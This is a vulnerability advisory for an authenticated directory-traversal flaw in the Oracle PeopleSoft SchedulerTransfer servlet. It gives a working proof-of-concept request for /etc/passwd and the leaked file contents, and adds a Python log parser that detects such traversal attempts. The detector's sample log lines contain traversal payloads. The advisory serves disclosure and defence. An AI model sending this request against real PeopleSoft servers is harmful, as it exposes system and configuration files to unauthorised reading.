Oracle Peoplesoft - Arbitrary File Retrieval - Authenticated

Vulnerable Systems:

  • Peoplesoft 8.51 and most likely all prior versions as well.

Description:

The SchedulerTransfer servlet accepts directory traversal sequences in the requested path, so an authenticated user can retrieve arbitrary files that are readable by the web server user.

POC:

The vulnerable servlet is:

  • /SchedulerTransfer/

Request
GET /SchedulerTransfer/<sitename>/..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd?&filestats=1 HTTP/1.1
Host: xxxxxxx.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Cookie: xxxxxxxxxxxxxxxxxxxxx

Response
HTTP/1.1 200 OK
Date: Wed, 14 Nov 2012 05:10:25 GMT
Content-Type: application/octet-stream
X-Powered-By: Servlet/2.5 JSP/2.1
X-Cache: MISS from xxxxxxxxx.com
Content-Length: 306692
Keep-Alive: timeout=120, max=100
Connection: Keep-Alive

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
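The traversal pattern shown in the POC (backslash separators against a Unix host, with the file name behind the site name) is easy to spot in web server access logs. The following detection logic is an added example, not part of the original advisory; it assumes common-log-format lines and uses constructed sample entries that mirror the POC request shape against /SchedulerTransfer/.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from the advisory).
SAMPLE_LOG = [
    r'10.0.0.5 - - [14/Nov/2012:05:10:25 +0000] "GET /SchedulerTransfer/HRMS/..\..\..\..\etc\passwd?&filestats=1 HTTP/1.1" 200 306692',
    r'10.0.0.6 - - [14/Nov/2012:05:11:02 +0000] "GET /SchedulerTransfer/HRMS/reports/report1.pdf?filestats=1 HTTP/1.1" 200 5120',
    r'10.0.0.7 - - [14/Nov/2012:05:11:40 +0000] "GET /SchedulerTransfer/HRMS/%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1024',
    r'10.0.0.8 - - [14/Nov/2012:05:12:10 +0000] "GET /psp/ps/EMPLOYEE/HRMS/c/..%5c..%5cpasswd HTTP/1.1" 404 0',
]

# Common log format: client, ident, user, [timestamp], "METHOD target PROTO", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+|-)$'
)


def normalise_path(target: str) -> str:
    """Strip the query string, undo (bounded) percent-encoding and unify separators.

    Backslashes are folded into forward slashes because the POC shows the servlet
    honouring '..\\' on a Linux host; bounded decoding catches %252e-style double encoding.
    """
    path = target.split("?", 1)[0]
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")


def is_traversal(target: str) -> bool:
    """True if any path segment of the normalised target is exactly '..'."""
    return any(seg == ".." for seg in normalise_path(target).split("/"))


def find_suspicious(lines, servlet_prefix="/SchedulerTransfer/"):
    """Return (client, raw target, status) for traversal attempts against the servlet."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; a real pipeline would count these separately
        target = m.group("target")
        if normalise_path(target).startswith(servlet_prefix) and is_traversal(target):
            hits.append((m.group("ip"), target, int(m.group("status"))))
    return hits


if __name__ == "__main__":
    for ip, target, status in find_suspicious(SAMPLE_LOG):
        print(f"{ip} {status} {target}")
```

A 200 status on a flagged request is the strongest signal, since the servlet returns the file body as application/octet-stream rather than an error.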

Impact:

The impact depends on how the flaw is exploited and on the read permissions of the web server user. Depending on these factors an attacker might carry out one or more of the following attacks:

  • Harvest useful information from the WebLogic configuration files.
  • Download the whole web application source code, including the vulnerable servlet itself.

Recommendation:

Please see the corresponding Oracle Critical Patch Update (CPU) at:
http://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/1841214.xml

© 2015 coma. All rights reserved.
Disclaimer: There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk.
In no event shall the author be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.